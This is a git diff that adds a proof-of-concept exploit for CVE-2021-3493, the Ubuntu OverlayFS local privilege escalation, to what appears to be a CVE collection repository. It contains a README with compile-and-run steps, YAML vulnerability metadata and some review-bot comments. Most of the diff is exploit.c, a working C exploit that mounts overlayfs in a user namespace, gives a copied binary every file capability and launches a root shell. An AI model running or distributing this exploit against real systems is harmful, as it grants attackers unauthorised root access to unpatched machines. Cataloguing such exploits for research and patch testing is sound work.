diff --git a/cve/linux-kernel/2021/CVE-2021-3493/README.md b/cve/linux-kernel/2021/CVE-2021-3493/README.md
new file mode 100644
index 0000000000000000000000000000000000000000..f69a385715330f9ab103c4ee36306e0641f9e5a4
--- /dev/null
+++ b/cve/linux-kernel/2021/CVE-2021-3493/README.md
@@ -0,0 +1,31 @@
+# CVE-2021-3493
+Ubuntu OverlayFS Local Privesc
+
+## Affected Versions
+
+- Ubuntu 20.10
+- Ubuntu 20.04 LTS
+- Ubuntu 18.04 LTS
+- Ubuntu 16.04 LTS
+- Ubuntu 14.04 ESM
+
+## Usage
+
+- ```gcc exploit.c -o exploit```
+- ```chmod +x exploit```
+- ```./exploit```
+
+## Description
+
+"Ubuntu specific issue in the overlayfs file system in the Linux kernel where it did not properly validate the application of file system capabilities with respect to user namespaces. A local attacker could use this to gain elevated privileges, due to a patch carried in Ubuntu to allow unprivileged overlayfs mounts." [- Ubuntu Security](https://ubuntu.com/security/CVE-2021-3493)
+
+Fixed in Linux 5.11
+
+## References
+- https://ssd-disclosure.com/ssd-advisory-overlayfs-pe/
+- https://ubuntu.com/security/CVE-2021-3493
+- https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=7c03e2cda4a584cadc398e8f6641ca9988a39d52
+- https://www.openwall.com/lists/oss-security/2021/04/16/1
+
+## Disclaimer
+I am not the author of this exploit. I have not made any modifications to the PoC found here: https://ssd-disclosure.com/ssd-advisory-overlayfs-pe/.
\ No newline at end of file
diff --git a/cve/linux-kernel/2021/CVE-2021-3493/exploit.c b/cve/linux-kernel/2021/CVE-2021-3493/exploit.c
new file mode 100644
index 0000000000000000000000000000000000000000..ae44269e40fc51cb95df2a4971ab9b84d703f7c3
--- /dev/null
+++ b/cve/linux-kernel/2021/CVE-2021-3493/exploit.c
@@ -0,0 +1,147 @@
+#define _GNU_SOURCE
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+
+//#include
+//#include
+int setxattr(const char *path, const char *name, const void *value, size_t size, int flags);
+
+
+#define DIR_BASE "./ovlcap"
+#define DIR_WORK DIR_BASE "/work"
+#define DIR_LOWER DIR_BASE "/lower"
+#define DIR_UPPER DIR_BASE "/upper"
+#define DIR_MERGE DIR_BASE "/merge"
+#define BIN_MERGE DIR_MERGE "/magic"
+#define BIN_UPPER DIR_UPPER "/magic"
+
+
+static void xmkdir(const char *path, mode_t mode)
+{
+ if (mkdir(path, mode) == -1 && errno != EEXIST)
+ err(1, "mkdir %s", path);
+}
+
+static void xwritefile(const char *path, const char *data)
+{
+ int fd = open(path, O_WRONLY);
+ if (fd == -1)
+ err(1, "open %s", path);
+ ssize_t len = (ssize_t) strlen(data);
+ if (write(fd, data, len) != len)
+ err(1, "write %s", path);
+ close(fd);
+}
+
+static void xcopyfile(const char *src, const char *dst, mode_t mode)
+{
+ int fi, fo;
+
+ if ((fi = open(src, O_RDONLY)) == -1)
+ err(1, "open %s", src);
+ if ((fo = open(dst, O_WRONLY | O_CREAT, mode)) == -1)
+ err(1, "open %s", dst);
+
+ char buf[4096];
+ ssize_t rd, wr;
+
+ for (;;) {
+ rd = read(fi, buf, sizeof(buf));
+ if (rd == 0) {
+ break;
+ } else if (rd == -1) {
+ if (errno == EINTR)
+ continue;
+ err(1, "read %s", src);
+ }
+
+ char *p = buf;
+ while (rd > 0) {
+ wr = write(fo, p, rd);
+ if (wr == -1) {
+ if (errno == EINTR)
+ continue;
+ err(1, "write %s", dst);
+ }
+ p += wr;
+ rd -= wr;
+ }
+ }
+
+ close(fi);
+ close(fo);
+}
+
+static int exploit()
+{
+ char buf[4096];
+
+ sprintf(buf, "rm -rf '%s/'", DIR_BASE);
+ system(buf);
+
+ xmkdir(DIR_BASE, 0777);
+ xmkdir(DIR_WORK, 0777);
+ xmkdir(DIR_LOWER, 0777);
+ xmkdir(DIR_UPPER, 0777);
+ xmkdir(DIR_MERGE, 0777);
+
+ uid_t uid = getuid();
+ gid_t gid = getgid();
+
+ if (unshare(CLONE_NEWNS | CLONE_NEWUSER) == -1)
+ err(1, "unshare");
+
+ xwritefile("/proc/self/setgroups", "deny");
+
+ sprintf(buf, "0 %d 1", uid);
+ xwritefile("/proc/self/uid_map", buf);
+
+ sprintf(buf, "0 %d 1", gid);
+ xwritefile("/proc/self/gid_map", buf);
+
+ sprintf(buf, "lowerdir=%s,upperdir=%s,workdir=%s", DIR_LOWER, DIR_UPPER, DIR_WORK);
+ if (mount("overlay", DIR_MERGE, "overlay", 0, buf) == -1)
+ err(1, "mount %s", DIR_MERGE);
+
+ // all+ep
+ char cap[] = "\x01\x00\x00\x02\xff\xff\xff\xff\x00\x00\x00\x00\xff\xff\xff\xff\x00\x00\x00\x00";
+
+ xcopyfile("/proc/self/exe", BIN_MERGE, 0777);
+ if (setxattr(BIN_MERGE, "security.capability", cap, sizeof(cap) - 1, 0) == -1)
+ err(1, "setxattr %s", BIN_MERGE);
+
+ return 0;
+}
+
+int main(int argc, char *argv[])
+{
+ if (strstr(argv[0], "magic") || (argc > 1 && !strcmp(argv[1], "shell"))) {
+ setuid(0);
+ setgid(0);
+ execl("/bin/bash", "/bin/bash", "--norc", "--noprofile", "-i", NULL);
+ err(1, "execl /bin/bash");
+ }
+
+ pid_t child = fork();
+ if (child == -1)
+ err(1, "fork");
+
+ if (child == 0) {
+ _exit(exploit());
+ } else {
+ waitpid(child, NULL, 0);
+ }
+
+ execl(BIN_UPPER, BIN_UPPER, "shell", NULL);
+ err(1, "execl %s", BIN_UPPER);
+}
\ No newline at end of file
diff --git a/cve/linux-kernel/2021/yaml/CVE-2021-3493.yaml b/cve/linux-kernel/2021/yaml/CVE-2021-3493.yaml
new file mode 100644
index 0000000000000000000000000000000000000000..ade74c393fc1cc591e6941b4aa727e4697294643
--- /dev/null
+++ b/cve/linux-kernel/2021/yaml/CVE-2021-3493.yaml
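Review bot: exploit.c declares `int setxattr(...)` by hand near the top of the file instead of including the header that provides it (`<sys/xattr.h>` on glibc), and the two commented-out `#include` lines directly above it suggest the header was dropped on purpose, but nothing records why; a one-line comment such as `/* declared locally; <sys/xattr.h> deliberately not included — see the commented-out includes above */` would stop the next reader from reverting it. The file also carries no header comment recording its provenance, even though the README's Disclaimer states it is an unmodified copy of the ssd-disclosure PoC; a top-of-file comment like `/* Unmodified PoC for CVE-2021-3493, taken from https://ssd-disclosure.com/ssd-advisory-overlayfs-pe/ */` would travel with the file when it is copied without the README. Two smaller points: `static int exploit()` should be `static int exploit(void)` so the definition is a proper prototype in C, and the `#include` lines appear with their header names stripped in this rendering, which looks like an extraction artifact rather than something the commit changed.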
@@ -0,0 +1,23 @@
+id: CVE-2021-3493
+source: https://github.com/Al1ex/LinuxEelvation/blob/master/CVE-2021-3493
+info:
+ name: Linux kernel是美国Linux基金会的开源操作系统Linux所使用的内核。
+ severity: high
+ description: |
+ Linux内核中overlayfs文件系统中的Ubuntu特定问题,在Ubuntu中没有正确验证关于用户名称空间的文件系统功能的应用程序。由于Ubuntu带有一个支持非特权的overlayfs挂载的补丁,因此本地攻击者可以使用它来进行提权操作,因此该漏洞对Linux的其他发行版没有影响。
+ scope-of-influence:
+ Ubuntu 20.10
+ Ubuntu 20.04 LTS
+ Ubuntu 18.04 LTS
+ Ubuntu 16.04 LTS
+ Ubuntu 14.04 ESM
+ (Linux-kernel < 5.11)
+ reference:
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-3493
+ - https://ubuntu.com/security/notices/USN-4917-1
+ classification:
+ cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 7.8
+ cve-id: CVE-2021-3493
+ cwe-id: CWE-269, CEW-270
+ tags: cve2021,权限提升
\ No newline at end of file
diff --git a/other_list.yaml b/other_list.yaml
index 54fe63098128b49cae181b27da96d1bed8a3667c..541b0d7cd8556e0405b54fb28f0ac392e9ef2348 100644
--- a/other_list.yaml
+++ b/other_list.yaml
@@ -2,6 +2,7 @@ cve:
 linux-kernel:
 - CVE-2021-33909
+ - CVE-2021-3493
 - CVE-2022-0995
 - CVE-2022-1015
 - CVE-2022-2602
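Review bot: The `cwe-id` line of CVE-2021-3493.yaml reads `CWE-269, CEW-270`; the second value looks like a transposition of `CWE-270` and will not match anything that filters or links on CWE identifiers. The `source:` field points at a third-party GitHub mirror, while the README added in the same commit says the PoC was taken unmodified from https://ssd-disclosure.com/ssd-advisory-overlayfs-pe/; the two should agree, or `source:` should cite the advisory the README names. The `name:` field holds a sentence describing the Linux kernel rather than a name for the vulnerability, presumably carried over from the source page — worth checking against how the other yaml entries in the repository fill that field.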